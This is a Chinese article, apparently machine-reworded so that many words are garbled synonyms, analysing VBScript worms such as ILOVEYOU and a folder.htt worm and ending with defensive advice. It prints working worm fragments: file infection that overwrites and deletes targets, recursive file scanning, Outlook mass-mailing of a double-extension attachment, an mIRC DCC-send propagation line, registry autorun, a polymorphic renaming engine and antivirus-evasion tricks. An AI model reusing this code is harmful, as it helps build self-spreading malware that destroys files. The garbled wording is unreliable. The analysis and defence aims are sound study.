VBS脚本病毒原理分析与防范

作家：guojpeng/cvc.gbemail:guojpeng@sina.com欢送连载，然而不得去掉作家消息搜集的时髦，让咱们的寰球变得越发优美，但它也有让人不欣喜的功夫。当您收到一封中心为“i love you”的邮件，用激动得简直快颤动的鼠标去点击附属类小部件的功夫；当您欣赏一个断定的网站之后，创造翻开每个文献夹的速率特殊慢的功夫，您能否发觉宏病毒仍旧闯进了您的寰球呢？2000年5月4日泰西暴发的“爱虫”搜集蠕虫宏病毒。因为经过电子邮件体例传递，爱虫宏病毒在短短几天内狂袭寰球数百万计的电脑。微软、intel等在前的稠密巨型企业搜集体例疯瘫，寰球财经丢失达几十亿美元。而客岁暴发的新痛快时间宏病毒于今都让宏大电脑用户更是苦不胜言。上头说起的两个宏病毒最大的一个共通特性是：运用vbscript编写。以爱虫和新痛快时间宏病毒为典范代办的vbs剧本宏病毒格外的猖狂，很要害的一个因为即是其编写大略。底下咱们就来逐个对vbs剧本宏病毒的各个上面加以领会：一、vbs剧本宏病毒的特性及兴盛近况vbs宏病毒是用vb script编写而成，该剧本谈话功效特殊宏大，它们运用windows体例的盛开性特性，经过挪用少许现成的windows东西、组件，不妨径直对文献体例、备案表等举行遏制，功效特殊宏大。该当说宏病毒即是一种思维，然而这种思维在用vbs实行时变得极端简单。vbs剧本宏病毒具备如次几个特性：1．编写大略，一个往日对宏病毒一问三不知的宏病毒喜好者不妨在很短的功夫里编出一个新式宏病毒来。2．妨害力大。其妨害力不只表此刻对用户体例文献及本能的妨害。他还不妨使邮件效劳器解体，搜集爆发重要阻碍。3．熏染力强。因为剧本是径直证明实行，而且它不须要像pe宏病毒那么，须要做搀杂的pe文献方法处置，所以这类宏病毒不妨径直经过自我复制的办法熏染其余同类文献，而且自我的特殊处置变得特殊简单。4．传递范畴大。这类宏病毒经过htm文书档案，email附属类小部件或其它办法，不妨在很短功夫内传遍寰球各地。5．宏病毒源码简单被获得，变种多。因为vbs宏病毒证明实行，其源代码可读性特殊强，纵然宏病毒源码过程加密处置后，其源代码的获得仍旧比拟大略。所以，这类宏病毒变种比拟多，略微变换一下宏病毒的构造，大概窜改一下特性值，很多杀毒软硬件大概就爱莫能助。6．捉弄性强。剧本宏病毒为特出到运转时机，常常会沿用百般让用户不大提防的本领，比方，邮件的附属类小部件名沿用双后缀，如.jpg.vbs，因为体例默许不表露后缀，如许，用户看到这个文献的功夫，就会觉得它是一个jpg图片文献。7．使抱病毒消费机实行起来特殊简单。所谓宏病毒消费机，即是不妨依照用户的志愿，消费宏病毒的呆板（固然，这边指的是步调），暂时的宏病毒消费机，之以是大普遍都为剧本宏病毒消费机，个中最要害的一点仍旧由于剧本是证明实行的，实行起来特殊简单，简直将在咱们反面谈及。正由于之上几个特性，剧本宏病毒兴盛特殊迅猛，更加是宏病毒消费机的展示，使得天生新式剧本宏病毒变得特殊简单。二、vbs剧本宏病毒道理领会 1．vbs剧本宏病毒怎样熏染、探求文献vbs剧本宏病毒普遍是径直经过自我复制来熏染文献的，宏病毒中的绝大局部代码都不妨径直附加在其余同类步调的中央，比方新痛快时间宏病毒不妨将本人的代码附加在.htm文献的尾部，并在顶部介入一条挪用宏病毒代码的语句，而爱虫宏病毒则是径直天生一个文献的复本，将宏病毒代码拷入个中，并以原文献名动作宏病毒文献名的前缀，vbs动作后缀。底下咱们经过爱虫宏病毒的局部代码简直领会一下这类宏病毒的熏染和探求道理：以次是文献熏染的局部要害代码：set fso=createobject("scripting.filesystemobject") '创造一个文献体例东西set self=fso.opentextfile(wscript.scriptfullname,1) '读翻开暂时文献（即宏病毒自己）vbscopy=self.readall ' 读取宏病毒十足代码到字符串变量vbscopy…… set ap=fso.opentextfile(目的文献.path,2,true) ' 写翻开目的文献，筹备写入宏病毒代码ap.write vbscopy ' 将宏病毒代码掩盖目的文献ap.closeset cop=fso.getfile(目的文献.path) '获得目的文献路途cop.copy(目的文献.path & ".vbs") ' 创造其余一个宏病毒文献（以.vbs为后缀）目的文献.delete(true) '简略目的文献上头刻画了宏病毒文献是怎样熏染平常文献的：开始将宏病毒自己代码赋给字符串变量vbscopy，而后将这个字符串掩盖写到目的文献，并创造一个以目的文献名为文献名前缀、vbs为后缀的文献复本，结果简略目的文献。底下咱们简直领会一下文献探求代码：'该因变量重要用来探求满意前提的文献，并天生对应文献的一个宏病毒复本sub scan(folder_) 'scan因变量设置，on error resume next '即使展示缺点，径直跳过，提防弹堕落误窗口set folder_=fso.getfolder(folder_)set files=folder_.files ' 暂时目次的一切文献汇合for each file in filesext=fso.getextensionname(file) '获得文献后缀ext=lcase(ext) '后缀名变换成小写假名if ext="mp5" then '即使后缀名是mp5，则举行熏染。请本人创造相映后缀名的文献，最佳利害平常后缀名 ，免得妨害平常步调。 wscript.echo (file)end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders '探求其余目次；递归挪用scan( ) scan(subfolder)next end sub 上头的代码即是vbs剧本宏病毒举行文献探求的代码领会。探求局部scan( )因变量做得比拟短小干练，特殊精巧，沿用了一个递归的算法遍历所有分区的目次和文献。2．vbs剧本宏病毒经过搜集传递的几种办法及代码领会 vbs剧本宏病毒之以是传递范畴广，重要依附于它的搜集传递功效，普遍来说，vbs剧本宏病毒沿用如次几种办法举行传递：1）经过email附属类小部件传递这是一种用的特殊一致的传递办法，宏病毒不妨经过百般本领拿到正当的email地方，最罕见的即是径直取outlook地方簿中的邮件地方，也不妨经过步调在用户文书档案（比方htm文献）中探求email地方。底下咱们简直领会一下vbs剧本宏病毒是怎样做到这一点的：function mailbroadcast()on error resume nextwscript.echoset outlookapp = createobject("outlook.application") //创造一个outlook运用的东西if outlookapp= "outlook" thenset mapiobj=outlookapp.getnamespace("mapi") //获得mapi的名字空间set addrlist= mapiobj.addresslists //获得地方表的个数for each addr in addrlistif addr.addressentries.count <> 0 thenaddrentcount = addr.addressentries.count //获得每个地方表的email记载数for addrentindex= 1 to addrentcount //遍历地方表的email地方set item = outlookapp.createitem(0) //获得一个邮件东西范例set addrent = addr.addressentries(addrentindex) //获得简直email地方item.to = addrent.address //填入接收者地方 item.subject = "宏病毒传递试验" //写入邮件题目item.body = "这边是宏病毒邮件传递尝试，收到此信请不要慌乱！" //写入文献实质set attachments=item.attachments //设置邮件附属类小部件attachments.add filesysobj.getspecialfolder(0) & "\test.jpg.vbs"item.deleteaftersubmit = true //函件提交后机动简略if item.to <> "" then item.send //发送邮件shellobj.regwrite "hkcu\software\mailtest\mailed", "1" //宏病毒标志，免得反复熏染end ifnextend ifnextend ifend function2）经过局域网共享传递局域网共享传递也是一种特殊一致而且灵验的搜集传递办法。普遍来说，为结果域网内交谈简单，确定生存不中国少年共产党享目次，而且具备可写权力，比方win2000创造共享时，默许即是具备可写权力。如许宏病毒经过探求那些共享目次，就不妨将宏病毒代码传递到那些目次之中。在vbs中，有一个东西不妨实行网上街坊共享文献夹的探求与文献操纵。咱们运用该东西就不妨到达传递的手段。welcome_msg = "搜集贯穿探求尝试"set wshnetwork = wscript.createobject("wscript.network") ’创造一个搜集东西set oprinters = wshnetwork.enumprinterconnections ’创造一个搜集打字与印刷机贯穿列表wscript.echo "network printer mappings:"for i = 0 to oprinters.count - 1 step 2 ’表露搜集打字与印刷机贯穿情景wscript.echo "port " & oprinters.item(i) & " = " & oprinters.item(i+1)next set coldrives = wshnetwork.enumnetworkdrives ’创造一个搜集共享贯穿列表if coldrives.count = 0 thenmsgbox "没有可列出的启动器。", vbinformation + vbokonly,welcome_msg elsestrmsg = "暂时搜集启动器贯穿: " & crlffor i = 0 to coldrives.count - 1 step 2 strmsg = strmsg & chr(13) & chr(10) & coldrives(i) & chr(9) & coldrives(i + 1)nextmsgbox strmsg, vbinformation + vbokonly, welcome_msg’表露暂时搜集启动器贯穿end if上头是一个用来探求暂时打字与印刷机贯穿和搜集共享贯穿并将它们表露出来的完备剧本步调。在领会了共享贯穿之后，咱们就不妨径直向目的启动器读写文献了。3）经过熏染htm、asp、jsp、php等网页文献传递此刻，www效劳仍旧变得特殊一致，宏病毒经过熏染htm等文献，必然会引导一切考察过该网页的用户呆板感抱病毒。宏病毒之以是不妨在htm文献中表现宏大功效，沿用了和绝大局部网页歹意代码沟通的道理。基础上，它们沿用了沟通的代码，然而也不妨沿用其它代码，这段代码是宏病毒fso,wsh等东西不妨在网页中运转的要害。在备案表hkey_classes_root\clsid\下咱们不妨找到这么一个主键{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}，备案表中对它他的证明是“windows script host shell object”，同样，咱们也不妨找到{0d43fe01-f093-11cf-8940-00a0c9054228}，备案表对它的证明是“filesystem object”，普遍先要对com举行初始化，在获得相映的组件东西之后，宏病毒便可精确地运用fso、wsh两个东西，挪用它们的宏大功效。代码如次所示：set apple0bject = document.applets("kj_guest")apple0bject.setclsid("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")apple0bject.createinstance() ’创造一个范例set wsshell apple0bject.get0bject()apple0bject.setclsid("{0d43fe01-f093-11cf-8940-00a0c9054228}")apple0bject.createinstance() ’创造一个范例set fso = apple0bject.get0bject()对于其余典型文献，这边不复逐一领会。4）经过irc谈天通道传递宏病毒经过irc传递普遍来说沿用以次代码（以mirc为例）dim mirc set fso=createobject("scripting.filesystemobject")set mirc=fso.createtextfile("c:\mirc\script.ini") ’创造文献script.inifso.copyfile wscript.scriptfullname, "c:\mirc\attachment.vbs", true ’将宏病毒文献备份到attachment.vbsmirc.writeline "[script]"mirc.writeline "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick c:\mirc\attachment.vbs }" '运用吩咐/ddc send $nick attachment.vbs给通道中的其余用户传递宏病毒文献mirc.close之上代码用交易script.ini文献中写入一条龙代码，本质中还会写入很多其余代码。script.ini中寄存着用来遏制irc对话的吩咐，这个文献内里的吩咐是不妨机动实行的。比方，“歌虫”宏病毒tune.vbs就会窜改c:\mirc\script.ini 和 c:\mirc\mirc.ini，使每当irc用户运用被熏染的通道时城市收到一份经过ddc发送的tune.vbs。同样，即使pirch98已安置在目的计划机的c:\pirch98目次下，宏病毒就会窜改c:\pirch98\events.ini和c:\pirch98\pirch98.ini，使每当irc用户运用被熏染的通道时城市收到一份经过ddc发送的tune.vbs。其余宏病毒也不妨经过此刻普遍时髦的kazaa举行传递。宏病毒将宏病毒文献正片到kazaa的默许共享目次中，如许，当其余用户考察这台呆板时，就有大概载入该宏病毒文献并实行。这种传递本领大概会跟着kazaa这种点对点共享东西的时髦而爆发效率。再有少许其余的传递本领，咱们这边不复逐一陈列。3．vbs剧本宏病毒怎样赢得遏制权怎样获得遏制权？这一个是一个比拟风趣的话题，而vbs剧本宏病毒犹如将这个话题表现的酣畅淋漓。笔者在这边列出几种典范的本领：1）窜改备案表项windows在启用的功夫，会机动加载hkey_local_machine\software\microsoft\windows\currentversion\run项下的各键值所执向的步调。剧本宏病毒不妨在此项下介入一个键值指向宏病毒步调，如许就不妨保护历次呆板启用的功夫拿到遏制权。vbs窜改贮册表的本领比拟大略，径直挪用底下语句即可。wsh.regwrite(strname, anyvalue [,strtype])2）经过映照文献实行办法比方，咱们新痛快时间将dll的实行办法窜改为wscript.exe。以至不妨将exe文献的映照指向宏病毒代码。3）捉弄用户，让用户本人实行这种办法本来和用户的情绪相关。比方，宏病毒在发送附属类小部件时，沿用双后缀的文献名，因为默许情景下，后缀并不表露，举个例子，文献名为beauty.jpg.vbs的vbs步调表露为beauty.jpg，这时候用户常常会把它当成一张图片去点击。同样，对于用户本人磁盘中的文献，宏病毒在熏染它们的功夫，将原有文献的文献名动作前缀，vbs动作后缀爆发一个宏病毒文献，并简略从来文献，如许，用户就有大概将这个vbs文献看作本人从来的文献运转。4）desktop.ini和folder.htt彼此共同这两个文献不妨用来摆设震动桌面，也不妨用来自设置文献夹。即使用户的目次中含有这两个文献，当用户加入该目次时，就会触发folder.htt中的宏病毒代码。这是新痛快时间宏病毒沿用的一种比拟灵验的获得遏制权的本领。而且运用folder.htt，还大概触发exe文献，这也大概变成宏病毒获得遏制权的一种灵验本领！宏病毒赢得遏制权的本领再有很多，这上面作家表现的余步也比拟大。4．vbs剧本宏病毒对立反宏病毒软硬件的几种本领宏病毒要存在，对立反宏病毒软硬件的本领也是必定的。普遍来说，vbs剧本宏病毒沿用如次几种对立反宏病毒软硬件的本领：1）自加密比方，新痛快时间宏病毒，它不妨随机采用密钥对本人的局部代码举行加密变幻，使得历次熏染的宏病毒代码都不一律，到达了多态的功效。这给保守的特性值查毒法带来了少许艰巨。宏病毒也还不妨进一步的沿用变形本领，使得历次熏染后的加密宏病毒的解密后的代码都不一律。底下看一个大略的vbs剧本变形引擎(来自flyshadow)randomizeset of = createobject("scripting.filesystemobject") ’创造文献体例东西vc = of.opentextfile(wscript.scriptfullname, 1).readall ’读取自己代码fs = array("of", "vc", "fs", "fsc") ’设置一个行将被替代字符的数组for fsc = 0 to 3vc = replace(vc, fs(fsc), chr((int(rnd * 22) + 65)) & chr((int(rnd * 22) + 65)) & chr((int(rnd * 22) + 65)) & chr((int(rnd * 22) + 65))) ’取4个随机字符替代数组fs中的字符串nextof.opentextfile(wscript.scriptfullname, 2, 1).writeline vc ’将替代后的代码写回文献上头这段代码使得该vbs文献在历次运转后，其of，vc，fs，fsc四字符串城市用随机字符串来包办，这在很大水平上不妨提防反宏病毒软硬件用特性值查毒法将其查出。2）精巧应用execute因变量用过vbs步调的伙伴能否会感触怪僻：当一个平常步调顶用到了filesystemobject东西的功夫，有些反宏病毒软硬件会在对这个步调举行扫描的功夫汇报说此vbs文献的危害为高，然而有些vbs剧本宏病毒同样沿用了filesystemobject东西，干什么却又没有任何劝告呢？因为很大略，即是由于那些宏病毒精巧的应用了execute本领。有些杀毒软硬件检验和测定vbs宏病毒时，会查看步调中能否证明运用了filesystemobject东西，即使沿用了，这会发出报告警方。即使宏病毒将这段证明代码变化为字符串，而后经过execute(string)因变量实行，就不妨隐藏某些反宏病毒软硬件。3）变换某些东西的证明本领比方fso=createobject("scripting.filesystemobject")，咱们将其变换为fso=createobject("script"＋"ing.filesyste"＋"mobject")，如许反宏病毒软硬件对其举行静态扫描时就不会创造filesystemobject东西。4）径直封闭反宏病毒软硬件vbs剧本功效宏大，它不妨径直在探求用户过程而后对过程名举行比拟，即使创造是反宏病毒软硬件的过程就径直封闭，并对它的某些要害步调举行简略。5．vbs宏病毒消费机的道理引见 所谓宏病毒消费机即是指不妨径直按照用户的采用产抱病毒源代码的软硬件。在很多人可见这大概不堪设想，本来对剧本宏病毒而言它的实行特殊大略。剧本谈话是证明实行的、不须要编写翻译，步调中不须要什么校验和定位，每条语句之间分割得比拟领会。如许，先将宏病毒功效做出很多独立的模块，在用户做出宏病毒功效采用后，消费机只须要将相映的功效模块聚集起来，结果再作相映的代码替代和优化即可。因为篇幅联系和其余因为，这边不作精细引见。三、怎样提防vbs剧本宏病毒 1．怎样从样品中索取（加密）剧本宏病毒 对于没有加密的剧本宏病毒，咱们不妨径直从宏病毒样品中找到来，此刻引见一下怎样从宏病毒样品中索取加密vbs剧本宏病毒，这边咱们以新痛快时间为例。用jediedit翻开folder.htt。咱们创造这个文献所有才93行，第一条龙<body onload="vbscript:kj_start()">，几行解释后，以<html>发端，</html>节尾。断定每部分都领会这是个什么典型的文献吧！ 第87行到91行，是如次语句：87：<script language=vbscript> 88：exestring = "afi fkseboa)eqiiqbtq)s^pqbtq)aadobapfdj)>mlibl^gb`p)cpk...；反面简略，很长！89：execute("dim keyarr(3),thistext"&vbcrlf&"keyarr(0) = 3"&vbcrlf&"keyarr(1) = 3"&vbcrlf&"keyarr(2) = 3"&vbcrlf&"keyarr(3) = 4"&vbcrlf&"for i=1 to len(exestring)"&vbcrlf&"tempnum = asc(mid(exestring,i,1))"&vbcrlf&"if tempnum = 18 then"&vbcrlf&"tempnum = 34"&vbcrlf&"end if"&vbcrlf&"tempchar = chr(tempnum + keyarr(i mod 4))"&vbcrlf&"if tempchar = chr(28) then"&vbcrlf&"tempchar = vbcr"&vbcrlf&"elseif tempchar = chr(29) then"&vbcrlf&"tempchar = vblf"&vbcrlf&"end if"&vbcrlf&"thistext = thistext & tempchar"&vbcrlf&"next") 90：execute(thistext) 91：</script> 第87和91行不必证明了，第88行是一个字符串的赋值，很鲜明这是被加密过的宏病毒代码。看看89行结果的一段代码thistext = thistext & tempchar，再加左右面那一条龙，咱们确定不妨猜到thistext内里放的是宏病毒解密代码（熟习vbs的伯仲固然也不妨领会一下这段解密代码，too simple!就算实足不看代码也该当不妨看得出来的)。第90行是实行方才thistext中的那段代码（过程解密处置后的代码）。那么，下一步该如何做呢？很大略，咱们只有在宏病毒代码解密之后，将thistext的实质输入到一个文本文献就不妨处置了。因为上头几行是vbscript,所以我创造了如次一个.txt文献：开始，copy第88、89两行到方才创造的.txt文献，固然即使你承诺看看新痛快时间的实行功效，你也不妨在结果输出第90行。而后在底下一条龙输出创造文献和将thistext写入文献vbs代码，所有文献如次所示： exestring = "afi... ’ 第88行代码 execute("dim keyar... ’ 第89行代码 set fso=createobject("scripting.filesystemobject") ’ 创造一个文献体例东西 set virusfile=fso.createtextfile("resource.log",true) ’ 创造一个新文献resource.log，用以寄存解密后的宏病毒代码 virusfile.writeline(thistext) ’ 将解密后的代码写入resource.log ok！就这么大略，生存文献，将该文献后缀名.txt改为.vbs(.vbe也不妨)，双击，你会创造该文献目次下多了一个文献resource.log，翻开这个文献，如何样？是否“新痛快时间”的源代码啊！2．vbs剧本宏病毒的缺点vbs剧本宏病毒因为其编写谈话为剧本，所以它不会像pe文献那么简单精巧，它的运转是须要前提的（然而这种前提默许情景下就完备了）。笔者觉得，vbs剧本宏病毒具备如次缺点：1）绝大局部vbs剧本宏病毒运转的功夫须要用到一个东西：filesystemobject2）vbscript代码是经过windows script host来证明实行的。3）vbs剧本宏病毒的运转须要其关系步调wscript.exe的扶助。4）经过网页传递的宏病毒须要activex的扶助5）经过email传递的宏病毒须要oe的机动发送邮件功效扶助，然而绝大局部宏病毒都是以email为重要传递办法的。3．怎样提防妥协除vbs剧本宏病毒对准之上提到的vbs剧本宏病毒的缺点，笔者提出如次会合提防办法：1）禁止使用文献体例东西filesystemobject本领：用regsvr32 scrrun.dll /u这条吩咐就不妨遏止文献体例东西。个中regsvr32是windows\system下的可实行文献。大概径直搜索scrrun.dll文献简略大概更名。再有一种本领即是在备案表中hkey_classes_root\clsid\下找到一个主键{0d43fe01-f093-11cf-8940-00a0c9054228}的项，咔嚓即可。2）卸载windows scripting host在windows 9第88中学（nt 4.0之上同理），翻开［遏制面板］→［增添/简略步调］→［windows安置步调］→［附属类小部件］，废除“windows scripting host”一项。和上头的本领一律，在备案表中hkey_classes_root\clsid\下找到一个主键{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}的项，咔嚓。3）简略vbs、vbe、js、jse文献后缀名与运用步调的映照点击［我的电脑］→［察看］→［文献夹选项］→［文献典型］，而后简略vbs、vbe、js、jse文献后缀名与运用步调的映照。4）在windows目次中，找到wscript.exe，变动称呼大概简略，即使你感触此后有时机用到的话，最佳变动称呼好了，固然此后也不妨从新装上。5）要完全防疫vbs搜集蠕虫宏病毒，还需树立一下你的欣赏器。咱们开始翻开欣赏器，单击菜单栏里“internet 选项”安定选项卡里的［自设置级别］按钮。把“activex控件及插件”的十足设为禁止使用，如许就不怕了。呵呵，比方新痛快时间的谁人activex组件即使不许运转，搜集传递这项功效就玩结束。6）遏止oe的机动收发邮件功效7）因为蠕虫宏病毒大多运用文献扩充名作作品，以是要提防它就不要湮没体例中已知文献典型的扩充名。windows默许的是“湮没已知文献典型的扩充称呼”，将其窜改为表露一切文献典型的扩充称呼。8）将体例的搜集贯穿的安定级别树立起码为“平淡”，它不妨在确定水平上提防某些无益的java步调大概某些activex组件对计划机的侵吞。9）呵呵，结果一项不说大师也该当领会了，杀毒软硬件真实很需要，纵然有些杀毒软硬件挺让宏大用户悲观，然而，采用是两边的哦。在这个宏病毒横飞的搜集，即使您的呆板没有装上杀毒软硬件我感触真实挺不堪设想的。四、对一切剧本类宏病毒兴盛的预测跟着搜集的飞快兴盛，搜集蠕虫宏病毒发端时髦，而vbs剧本蠕虫则越发超过，不只数目多，并且能力大。因为运用剧本编写宏病毒比拟大略，除去将连接时髦暂时的vbs剧本宏病毒外，将会渐渐展示更多的其它剧本类宏病毒，比方php，js，perl宏病毒等。然而剧本并不是真实宏病毒本领喜好者编写宏病毒的最好东西，而且剧本宏病毒废除起来比拟简单、对立简单提防。笔者觉得，剧本宏病毒仍将连接时髦，然而不妨具备像爱虫、新痛快时间那么大感化的剧本蠕虫宏病毒不过少量。